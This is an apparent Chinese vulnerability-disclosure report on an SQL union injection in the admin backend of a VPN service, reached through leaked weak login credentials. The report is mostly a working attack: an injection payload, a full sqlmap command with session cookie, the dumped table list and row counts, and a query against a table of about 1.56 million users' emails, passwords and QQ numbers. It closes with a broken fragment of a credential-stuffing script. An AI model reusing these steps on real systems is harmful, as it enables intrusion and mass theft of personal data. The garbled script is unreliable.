漏洞标题:wiz笔记泄漏信息之imxvpn后台SQLunion注入/泄漏156W用户 邮箱 帐号 密码


漏洞作者: 我在不想理你

提交时间:2016-05-04 16:27

修复时间:2016-05-09 16:30

2016-05-04: 细节已通知厂商并且等待厂商处理中
2016-05-09: 厂商已经主动忽略漏洞,细节向公众公开







然后我登录    mxvpn1/123456





黄天不负,在这找到了一枚union注入 and 8=7 union select 1,2,3,4,5,6,7,8,9,10,11,12,13%23

sqlmap -u '' --prefix=')' --suffix='%23' -p 'qid' --union-col=13  --cookie='PHPSESSID=sgo3i0sejsv58va4lq362q8h55' --technique=U --threads 10 -D radius --tables --count
___ ___| |_____ ___ ___ {}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:58:23
[21:58:23] [INFO] resuming back-end DBMS 'mysql'
[21:58:23] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
Parameter: qid (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 13 columns (custom)
Payload: m=radius&c=faq&a=showfaq&qid=-3805) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,0x5a4e6a4865536f6b7a59766e6f4e487846654d4c70635650685a4469577964514269736e57496453,0x7176707171),NULL,NULL,NULL,NULL,NULL,NULL#
[21:58:24] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5
[21:58:24] [INFO] fetching tables for database: 'radius'
[21:58:24] [INFO] the SQL query used returns 59 entries
[21:58:24] [INFO] starting 10 threads
Database: radius
[59 tables]
| _report |
| alipay_log |
| dmq_action |
| dmq_action_log |
| dmq_auth_group |
| dmq_auth_group_access |
| dmq_auth_rule |
| dmq_datas |
| dmq_datastype |
| dmq_members |
| dmq_modules |
| dmq_online_report |
| dmq_oreport_view |
| dmq_radius_case |
| dmq_radius_email_notice |
| dmq_radius_faq |
| dmq_radius_faq_data |
| dmq_radius_faq_post |
| dmq_radius_faq_type |
| dmq_rebate_apply |
| dmq_rebate_order |
| dmq_rebate_promotion |
| dmq_rebate_promotion_old |
| dmq_rebate_setting |
| dmq_rebate_user |
| mx_rm_coupon |
| mx_rm_goods |
| mx_rm_order |
| mx_rm_order_old |
| mx_rm_radacct |
| mx_rm_syslog |
| nas |
| pre_kaijuan_promotion |
| radacct |
| radacct1 |
| radcheck |
| radgroupcheck |
| radgroupreply |
| radpostauth |
| radreply |
| radusergroup |
| rm_actsrv |
| rm_allowedmanagers |
| rm_allowednases |
| rm_cards |
| rm_changesrv |
| rm_ias |
| rm_invoices |
| rm_managers |
| rm_radacct |
| rm_radacct1 |
| rm_services |
| rm_settings |
| rm_specperacnt |
| rm_specperbw |
| rm_syslog |
| rm_usergroups |
| rm_users |
| usercount |
[21:58:24] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
[21:58:24] [WARNING] reflective value(s) found and filtering out
[21:58:50] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
Database: radius
| Table | Entries |
| radacct | 25086862 |
| radcheck | 3214421 |
| rm_users | 1559710 |
| mx_rm_syslog | 1294390 |
| rm_actsrv | 876733 |
| mx_rm_order | 232206 |
| dmq_rebate_promotion | 176086 |
| dmq_rebate_promotion_old | 141286 |
| mx_rm_order_old | 114727 |
| mx_rm_radacct | 38960 |
| dmq_action_log | 34498 |
| dmq_oreport_view | 27616 |
| dmq_rebate_order | 14232 |
| dmq_radius_case | 13897 |
| rm_changesrv | 6911 |
| dmq_online_report | 6447 |
| rm_allowednases | 3637 |
| pre_kaijuan_promotion | 3097 |
| dmq_radius_email_notice | 2685 |
| _report | 529 |
| rm_syslog | 376 |
| nas | 300 |
| rm_allowedmanagers | 222 |
| dmq_radius_faq_post | 102 |
| dmq_radius_faq | 89 |
| dmq_radius_faq_data | 89 |
| alipay_log | 82 |
| rm_services | 81 |
| dmq_auth_rule | 54 |
| mx_rm_goods | 11 |
| rm_managers | 10 |
| dmq_datas | 9 |
| dmq_auth_group_access | 6 |
| dmq_members | 6 |
| dmq_modules | 5 |
| mx_rm_coupon | 4 |
| rm_ias | 4 |
| dmq_auth_group | 3 |
| dmq_datastype | 3 |
| dmq_radius_faq_type | 3 |
| rm_invoices | 3 |
| dmq_action | 2 |
| dmq_rebate_apply | 2 |
| dmq_rebate_user | 2 |
| rm_usergroups | 2 |
| dmq_rebate_setting | 1 |
| rm_settings | 1 |

rm_users表里有156W个用户,泄漏信息包括邮箱 帐号 密码 QQ等相关信息



sql-shell> select * from rm_users limit 0,100
[22:01:54] [INFO] fetching SQL SELECT statement query output: 'select * from rm_users limit 0,100'
[22:01:54] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself
[22:01:54] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[22:01:54] [INFO] fetching current database
[22:01:54] [INFO] fetched tables' columns on database 'radius'
[22:01:54] [INFO] the query with expanded column name(s) is: SELECT acctype, address, cardfails, city, comblimit, comment, company, country, createdby, createdon, credits, custattr, dis_record, downlimit, email, email_status, enableuser, expiration, firstname, groupid, lastname, mac, maccm, mobile, owner, password, phone, qq, selfreg, srvid, state, staticip, taxid, uplimit, uptimelimit, usemacauth, username, usestaticip, verified, verifycode, verifyfails, verifymobile, verifysentnum, warningsent, zip FROM rm_users LIMIT 0,100
[22:01:54] [INFO] starting 10 threads
ps:审核大大,我能否发个撞库wiz脚本,想看的人必须支付2WB才能看,能的话帮我添加上,不能就把本行删掉吧 以下是代码

import md5
import json
import requests
import xmltodict
from wiz.client import Wiz
from bs4 import BeautifulSoup
def logined(username,password):
'Accept-Encoding':'gzip, deflate',
data='''<?xml version="1.0"?>
print r.content
return len(r.content)>1000
if __name__ == '__main__':
print logined('username','password')

